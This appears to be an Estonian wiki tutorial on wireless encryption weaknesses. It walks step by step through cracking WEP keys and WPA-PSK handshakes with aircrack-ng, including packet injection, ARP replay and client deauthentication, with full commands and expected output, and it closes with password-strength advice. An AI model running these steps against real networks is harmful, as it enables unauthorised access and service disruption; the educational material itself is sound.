|
|
| Line 1: |
Line 1: |
| == WPA/WPA2 ==
| |
|
| |
|
|
| |
| Järgmise põlvkonna meetod krüpteerimaks traadita võrke (''WiFi'') on '''WPA''' ehk ''Wi-Fi Protected Access''. Teadagi, pole ükski süsteem perfektne. Kõige lihtsam viis kasutamaks WPA krüpteeringut tundub olevat tema suurim viga ning selleks on ''Pre-Shared Key'' (PSK). WPA-PSK lubab administraatoril kindlaks määrata salasõna, mis peab olema teada igale ''Access Point'' kasutajale. ''Access Point'' on seade, mis lubab traadita võrke kasutavaid vahendeid ühendada võrku kasutades selleks kas WiFi’t, Bluetoothi vms. WPA-PSK kasutades ollakse avatud rünnakutele (''offline dictionary attack''), kus ründaja loeb pakette ajal, mil keegi ühendab ennast võrku ning kasutades neid pakette on võimalik taastada ''Pre-Shared Key'' ehk salasõna. Seda juhul, kui määratud salasõna ei ole liiga pikk. Tüüpiline viga, mida inimesed teevad, kui nad omale salasõna valivad on see, et nad kasutavad lihtsaid sõnu, fraase, mis on lühikesed ja ei sisalda numbreid või sümboleid. Taolised salasõnad on ''dictionary attack'' tehnikale maiuspalaks. On olemas palju erinevaid vahendeid ja tööriistu sellise protsessi läbiviimiseks. Üks tõhusamaid minu enda kogemuse põhjal on '''Aircrack'''. See on kogumik erinevatest tööriistadest:
| |
|
| |
| • '''Airodump''': programm pakettide püüdmiseks
| |
|
| |
| • '''Aireplay''': programm pakettide „süstimiseks“
| |
|
| |
| • '''Aircrack''': staatiline WEP ja WPA-PSK võtme kräkkija
| |
|
| |
| • '''Airdecap''': WEP/WPA püütud failide dekrüptimiseks
| |
|
| |
| Krüpteeritud võrgu häkkimise aeg sõltub liiklusest võrgus (''traffic''). Mida vähem liiklust, seda rohkem läheb aega andmete kogumiseks ning vastupidi. Sellepärast kasutataksegi Aireplay tööriista. See on vahend liikluse tekitamiseks või genereerimiseks. Aireplay võimaldab suurendada liiklust, mistõttu kiireneb ka kogu kräkkimise protsess.
| |
| Üks tähtis eripära WPA/WPA2 ja WEP kräkkimise vahel on lähenemisviis kräkkimaks WPA/WPA2 Pre-Shared võtit (''Pre-Shared Key''). Kui WEP kräkkimisel saab kiirendada protsessi staatiliste meetoditega, siis WPA/WPA2 puhul on ainsaks abiks ''plain brute force'' tehnikad ehk nö. toore-jõu tehnikad. See on sellepärast, et võti ei ole staatiline – protsessi kiirendamine ei ole võimalik nii nagu WEP kräkkimisel. Ainus viis info saamiseks on ühendus kliendi ja ''Access Point'' vahel (''handshake''). ''Handshake'' toimub, kui klient ühendab võrguga. Kuna salasõna võib olla 8 kuni 63 tähemärki, siis muutub WPA/WPA2 kräkkimine võimatuks, kui salasõna koosneb 63 suvaliselt genereeritud tähemärgist ja sümbolist. Ehk kui salasõna on võimalikult lühike ja ei sisaldada palju numbreid on veel võimalik nimetatud protsess läbi viia. Arvuti suudab testida 50 kuni 300 võimalikku võtit sekundis olenevalt arvutist. Pikkade salasõnade kräkkimine võib aega võtta tunde, päevi isegi aastaid. Lähemalt võib arvutada siit: [http://lastbit.com/pswcalc.asp]
| |
|
| |
|
| |
|
| |
| == WEP ==
| |
|
| |
| '''WEP''' (''wired equivalent privacy'') on krüpteerimismeetod traadita võrkude kaitseks. Tegemist on väga vana ning algelise kaitsega, mistõttu on seda lihtne lahti kräkkida. WEP’il on kolm seadistust: off ehk kaitse maas, 64-bit ehk nõrk kaitse ning 128-bit ehk natukene tugevam kaitse. Kui WEP on off staadiumis, siis võib iga suvaline inimene ennast võrku ühendada. Kasutades kas 64-bit või 128-bit kaitset on teoreetiliselt võrk siiski kaitstud, kuid reaalselt ei ole vahet, kas kasutatakse 64-bit või 128-bit kaitset, sest mõlemad võtmed on ühtemoodi kräkitavad. WEP’i kräkkimisprotsess baseerub '''IV'''’del ehk ''Initalization Vector''itel. Kogudes piisavalt palju IV’si on WEP kräkkimine vaid aja küsimus.
| |
|
| |
|
| |
| == Näide WEP kräkkimise protsessist ==
| |
|
| |
| '''Eeldused:'''
| |
|
| |
| • Õiged driverid, et viia läbi „süstimine“ (''injection'')
| |
|
| |
| • Ollakse füüsiliselt piisavalt lähedale Access Pointile
| |
|
| |
| • Kasutatakse v0.9.1 või suuremat versiooni aircrack-ng’st
| |
|
| |
| • Kasutatakse Linuxit aircrack jaoks
| |
|
| |
| • Võrgus on vähemalt 1 aktiivne klient
| |
|
| |
| '''Alustamine:'''
| |
|
| |
| Soovitav on üles märkida järgmised andmed:
| |
|
| |
| • Arvuti MAC aadress, mis jooksutab aircrack-ng'd (''näide: 00:0F:B5:88:AC:82'')
| |
|
| |
| • BSSID (Access Point MAC aadress (''näide: 00:14:6C:7E:40:80'')
| |
|
| |
| • ESSID (''võrgu nimi'') (''näide: metsaloomad'')
| |
|
| |
| • Access Point’i kanal (''näide: 9'')
| |
|
| |
| • Wireless interface (''näide: ath0'')
| |
|
| |
| '''Lahendus:'''
| |
|
| |
| Eesmärgiks on püüda kinni võimalikult palju IV’si. Tavaliselt ei genereerita neid IV’si just väga kiiresti normaalse võrguliikluse (''network traffic'') puhul. Kuna me oleme kannatamatud, siis kasutatakse siinkohal „süstimise“ (''injection'') tehnikat, et protsessi kiirendada. Selle tehnika puhul saadab Access Point valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda võimalikult palju IV’si võimalikult vähese ajaga.
| |
|
| |
| '''Sammud selleks:'''
| |
|
| |
| • Seadistada ennast kindlale Access Point kanalile (''näiteks siin 9'')
| |
|
| |
| • Testida „süstimise“ suutlikkust Access pointile
| |
|
| |
| • Kasutada aireplay-ng'd vale audentimise läbiviimiseks Access Pointiga
| |
|
| |
| • Panna tööle airodump-ng sellel Access Point kanalil koos BSSID filtriga, kogumaks IV’si
| |
|
| |
| • Kasutada aireplay-ng'd pakettide süstimiseks
| |
|
| |
| • Kasutada aircrack-ng'd kräkkimaks salasõna, kasutades ära kogutud IV’si
| |
|
| |
|
| |
| Esmalt tuleb avada konsooli aken ning oma wifi kaart panna seisundisse ''monitor mode''. See on seisund, kus kaart kuulab igat paketti. Igat paketti kuulates on võimalik valida välja mõned neist et viia läbi „süstimine“. Kirjutades käsureale '''airmon-ng stop ath0''' peaks tulema taoline vastus:
| |
|
| |
| Interface Chipset Driver
| |
|
| |
| wifi0 Atheros madwifi-ng
| |
| ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
| |
|
| |
| Tuleb sulgeda kõik athX. Kui on suletud kõik athX ning kirjutades käsureale '''iwconfig''' peaks tulemus olema:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| Seejärel seadistame võrgukaardi 9-ndale kanalile käsuga''' airmon-ng start wifi0 9''' ning sisestame uuesti kontrollimiseks '''iwconfig'''
| |
| Tulemus peaks olema taoline:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| ath0 IEEE 802.11g ESSID:"" Nickname:""
| |
| Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
| |
| Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
| |
| Retry:off RTS thr:off Fragment thr:off
| |
| Encryption key:off
| |
| Power Management:off
| |
| Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
| |
| Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
| |
| Tx excessive retries:0 Invalid misc:0 Missed beacon:0
| |
|
| |
| Järgnevalt tuleb testida „süstimise“ suutlikkust Access pointile. Selle sammu eesmärgiks on selgitada, kas ollakse piisavalt lähedal Access pointile, et sinna pakette „süstida“. Käsureale tuleb sisestada '''aireplay-ng -9 -e metsaloomad -a 00:14:6C:7E:40:80 ath0'''
| |
| Vastus peaks välja nägema:
| |
|
| |
| 09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
| |
| 09:23:35 Trying broadcast probe requests...
| |
| 09:23:35 Injection is working!
| |
| 09:23:37 Found 1 AP
| |
|
| |
| 09:23:37 Trying directed probe requests...
| |
| 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'metsaloomad'
| |
| 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
| |
| 09:23:39 30/30: '''100%'''
| |
|
| |
| Viimane rida näitab, kas ollakse piisavalt lähedal või mitte ning kas on võimalik viia läbi „süstimine“. Järgnevalt püütakse IV’si, kasutades selleks airodump-ng’d. Selleks kirjutatakse uude konsooli aknasse '''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0''' Kui „süstimine“ õnnestub on mingi aja vältel tulemuseks:
| |
|
| |
|
| |
| CH 9 ][ Elapsed: 8 mins ][ 2010-03-21 19:25
| |
|
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
| |
|
| |
| 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP metsaloomad
| |
|
| |
| BSSID STATION PWR Lost Packets Probes
| |
|
| |
| 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
| |
|
| |
| Kasutades aireplay-ng’d luuakse võlts audentimine Access Pointiga. Selleks trükitakse uude konsooli aknasse järgmine käsurida '''aireplay-ng -1 0 -e metsaloomad -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'''
| |
|
| |
| (''variatsioon sellest: aireplay-ng -1 6000 -o 1 -q 10 -e metsaloomad -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'')
| |
|
| |
| Õnnestumise korral on tulemuseks:
| |
|
| |
| 18:18:20 Sending Authentication Request
| |
| 18:18:20 Authentication successful
| |
| 18:18:20 Sending Association Request
| |
| 18:18:20 Association successful :-)
| |
|
| |
| Ebaõnnestumise korral on tulemuseks:
| |
|
| |
| 8:28:02 Sending Authentication Request
| |
| 18:28:02 Authentication successful
| |
| 18:28:02 Sending Association Request
| |
| 18:28:02 Association successful :-)
| |
| 18:28:02 Got a deauthentication packet!
| |
| 18:28:05 Sending Authentication Request
| |
| 18:28:05 Authentication successful
| |
| 18:28:05 Sending Association Request
| |
| 18:28:10 Sending Authentication Request
| |
| 18:28:10 Authentication successful
| |
| 18:28:10 Sending Association Request
| |
|
| |
| Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ''ARP requeste'', et neid siis tagasi võrku „süstida“. Selleks kirjutatakse uude konsooli aknasse '''aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'''
| |
| Tulemus peaks välja nägema selline:
| |
|
| |
| Saving ARP requests in replay_arp-0321-191525.cap
| |
| You should also start airodump-ng to capture replies.
| |
| Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
| |
|
| |
| Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV’de põhjal. Selleks avatakse uus konsooli aken ning sisestatakse '''aircrack-ng -b 00:14:6C:7E:40:80 output*.cap'''
| |
| Tulemus on järgmine:
| |
|
| |
|
| |
| [00:03:06] Tested 674449 keys (got 96610 IVs)
| |
|
| |
| KB depth byte(vote)
| |
| 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
| |
| 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
| |
| 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
| |
| 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
| |
|
| |
| KEY FOUND! [ '''12''':'''34''':'''56''':'''78''':'''90''' ]
| |
| Probability: 100%
| |
|
| |
|
| |
| == Näide WPA kräkkimise protsessist ==
| |
|
| |
| '''Eeldused:'''
| |
|
| |
| • Õiged driverid, et viia läbi „süstimine“ (''injection'')
| |
|
| |
| • Ollakse füüsiliselt piisavalt lähedale Access Pointile
| |
|
| |
| • Kasutatakse v0.9.1 või suuremat versiooni aircrack-ng’st
| |
|
| |
| • Kasutatakse Linuxit aircrack jaoks
| |
|
| |
| '''Alustamine:'''
| |
|
| |
| Soovitav on üles märkida järgmised andmed:
| |
|
| |
| • Arvuti MAC aadress, mis jooksutab aircrack-ng (''näide: 00:0F:B5:88:AC:82'')
| |
|
| |
| • Kliendi MAC aadress, kes kasutab WPA/WPA2 (''näide: 00:0F:B5:FD:FB:C2'')
| |
|
| |
| • BSSID (Access Point MAC aadress (''näide: 00:14:6C:7E:40:80'')
| |
|
| |
| • ESSID (''võrgu nimi'') (''näide: metsaloomad'')
| |
|
| |
| • Access Point’i kanal (''näide: 9'')
| |
|
| |
| • Wireless interface (''näide: ath0'')
| |
|
| |
| '''Lahendus:'''
| |
|
| |
| Eesmärgiks on püüda kinni WPA/WPA2 audentimise ''handshake'' ning seejärel kasutades aircrack-ng'd leida ''Pre-Shared Key'' või salasõna.
| |
|
| |
| '''Sammud selleks:'''
| |
|
| |
| • Seadistada ennast kindlale Access Point kanalile (''näiteks siin 9'')
| |
|
| |
| • Panna tööle airodump-ng sellel Access Point kanalil koos BSSID filtriga, kogumaks audentimise käepigistust (''handshake'')
| |
|
| |
| • Kasutada aireplay-ng kliendi deaudentimiseks
| |
|
| |
| • Kasutada aircrack-ng kräkkimaks salasõna kasutades ära ''handshake''’i
| |
|
| |
| Esmalt tuleb avada konsooli aken ning oma wifi kaart panna seisundisse ''monitor mode''. See on seisund, kus kaart kuulab igat paketti. Igat paketti kuulates on võimalik leida ''handshake''. Kirjutades käsureale '''airmon-ng''' peaks tulema vastuseks:
| |
|
| |
| Interface Chipset Driver
| |
|
| |
| rausb0 Ralink RT73 rt73
| |
| wlan0 Broadcom b43 - [phy0]
| |
| wifi0 Atheros madwifi-ng
| |
| ath0 Atheros madwifi-ng VAP (parent: wifi0)
| |
|
| |
| Kõigepealt tuleb sulgeda kõik athX. Siinkohal kirjutame käsureale '''airmon-ng stop ath0''' Kui on suletud kõik athX ning kirjutades käsureale '''iwconfig''' peaks tulemus olema:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| Seejärel seadistame võrgukaardi 9-ndale kanalile käsuga '''airmon-ng start wifi0 9''' ning sisestame uuesti kontrollimiseks '''iwconfig'''
| |
| Tulemus peaks olema midagi sellist:
| |
|
| |
| lo no wireless extensions.
| |
|
| |
| wifi0 no wireless extensions.
| |
|
| |
| eth0 no wireless extensions.
| |
|
| |
| ath0 IEEE 802.11g ESSID:"" Nickname:""
| |
| Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
| |
| Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
| |
| Retry:off RTS thr:off Fragment thr:off
| |
| Encryption key:off
| |
| Power Management:off
| |
| Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
| |
| Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
| |
| Tx excessive retries:0 Invalid misc:0 Missed beacon:0
| |
|
| |
|
| |
| Järgmiseks kasutatakse airodump-ng'd ''handshake'' kogumiseks (''uus konsooli aken''): '''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0'''
| |
|
| |
| Õnnestunud ''handshake'' korral on tulemus:
| |
|
| |
| CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
| |
|
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
| |
|
| |
| 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK metsaloomad
| |
|
| |
| BSSID STATION PWR Lost Packets Probes
| |
|
| |
| 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
| |
|
| |
| Ebaõnnestunud ''handshake'' korral on tulemus:
| |
|
| |
| CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
| |
|
| |
| BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
| |
|
| |
| 00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK metsaloomad
| |
|
| |
| BSSID STATION PWR Lost Packets Probes
| |
|
| |
| Siit edasi kasutatakse aireplay-ng'd, et deaudentida klient. See osa on valikuline, sest võib jääda ka ootama, kuni airodump-ng püüab kinni ''handshake''’i. Protsessi kiirendamiseks tuleb uude konsooli aknasse kirjutada '''aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0''' , mille tulemus peaks olema:
| |
|
| |
| 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
| |
|
| |
| Viimaks, kui on püütud kinni ''handshake'' proovitakse salasõna kräkkida. Selleks avatakse uus konsooli aken ning trükitakse '''aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap'''
| |
| Kui ''handshake''’i pole püütud on vastuseks:
| |
|
| |
| Opening psk-01.cap
| |
| Opening psk-02.cap
| |
| Opening psk-03.cap
| |
| Opening psk-04.cap
| |
| Read 1827 packets.
| |
|
| |
| No valid WPA handshakes found.
| |
|
| |
| Sellisel juhul tuleb teha uuesti kliendi deaudentimine. Kui ''handshake'' püüti kinni, siis tulemus on selline:
| |
|
| |
| Opening psk-01.cap
| |
| Opening psk-02.cap
| |
| Opening psk-03.cap
| |
| Opening psk-04.cap
| |
| Read 1827 packets.
| |
|
| |
| # BSSID ESSID Encryption
| |
|
| |
| 1 00:14:6C:7E:40:80 metsaloomad WPA (1 handshake)
| |
|
| |
| Choosing first network as target.
| |
|
| |
| Siinkohal proovib aircrack-ng salasõna lahti kräkkida. See võib võtta tunde või isegi päevi. Õnnestumise korral on vastus selline:
| |
|
| |
| Aircrack-ng 0.8
| |
|
| |
|
| |
| [00:00:00] 2 keys tested (37.20 k/s)
| |
|
| |
|
| |
| KEY FOUND! [ '''12345678''' ]
| |
|
| |
|
| |
| Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
| |
| B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
| |
|
| |
| Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
| |
| CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
| |
| FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
| |
| 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
| |
|
| |
| EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
| |
|
| |
| Selleks, et oma võrku piisavalt hästi kaitsta, tuleks kindlasti eelistada WPA’d WEP’ile. Soovitav on kasutada salasõnas kombinatsioone tähtedest, numbritest ja sümbolitest ning valida võtmed, mis on piisavalt pikad, et muuta nende kräkkimine praktiliselt võimatuks.
| |
|
| |
|
| |
| == Kasutatud kirjandus ==
| |
|
| |
|
| |
| http://it.toolbox.com/blogs/unwired/wpa-encryption-cracking-7419
| |
|
| |
| http://it.toolbox.com/blogs/unwired/cracking-wpapsk-6730
| |
|
| |
| http://www.aircrack-ng.org/doku.php?id=cracking_wpa
| |
|
| |
| http://connect-connect.blogspot.com/2007/09/wireless-security-insight-into-wep.html
| |
|
| |
| http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
| |
